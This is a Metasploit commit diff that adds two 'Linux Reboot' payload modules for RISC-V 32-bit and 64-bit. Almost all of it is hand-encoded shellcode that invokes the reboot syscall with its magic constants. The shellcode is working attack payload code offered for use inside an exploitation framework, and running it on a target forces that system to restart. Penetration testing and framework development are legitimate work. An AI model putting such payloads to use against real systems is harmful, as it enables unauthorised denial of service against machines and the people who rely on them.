Add Linux Reboot 32-bit/64-bit RISC-V LE payloads

bcoles · bcoles · commit 92cf931d6e95 · 2024-10-15T22:51:36.000+11:00
diff --git a/modules/payloads/singles/linux/riscv32le/reboot.rb b/modules/payloads/singles/linux/riscv32le/reboot.rb
@@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 32
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Linux Reboot',
+        'Description' => %q{
+          A very small shellcode for rebooting the system using
+          the reboot syscall. This payload is sometimes helpful
+          for testing purposes.
+        },
+        'Author' => 'bcoles',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_RISCV32LE
+      )
+    )
+  end
+
+  def generate(_opts = {})
+    shellcode =
+      [0xfee1e537].pack('V*') + # lui   a0,0xfee1e
+      [0xead50513].pack('V*') + # addi  a0,a0,-339
+      [0x281225b7].pack('V*') + # lui   a1,0x2812
+      [0x96958593].pack('V*') + # addi  a1,a1,-1687
+      [0x01234637].pack('V*') + # lui   a2,0x1234
+      [0x56760613].pack('V*') + # addi  a2,a2,1383
+      [0x08e00893].pack('V*') + # li    a7,142
+      [0x00000073].pack('V*')   # ecall
+
+    super.to_s + shellcode
+  end
+end
diff --git a/modules/payloads/singles/linux/riscv64le/reboot.rb b/modules/payloads/singles/linux/riscv64le/reboot.rb
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 40
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Linux Reboot',
+        'Description' => %q{
+          A very small shellcode for rebooting the system using
+          the reboot syscall. This payload is sometimes helpful
+          for testing purposes.
+        },
+        'Author' => 'bcoles',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_RISCV64LE
+      )
+    )
+  end
+
+  def generate(_opts = {})
+    shellcode =
+      [0x0007f537].pack('V*') + # lui    a0,0x7f
+      [0x70f5051b].pack('V*') + # addiw  a0,a0,1807
+      [0x00d51513].pack('V*') + # slli   a0,a0,0xd
+      [0xead50513].pack('V*') + # addi   a0,a0,-339
+      [0x281225b7].pack('V*') + # lui    a1,0x28122
+      [0x9695859b].pack('V*') + # addiw  a1,a1,-1687
+      [0x01234637].pack('V*') + # lui    a2,0x1234
+      [0x5676061b].pack('V*') + # addiw  a2,a2,1383
+      [0x08e00893].pack('V*') + # li     a7,142
+      [0x00000073].pack('V*')   # ecall
+
+    super.to_s + shellcode
+  end
+end
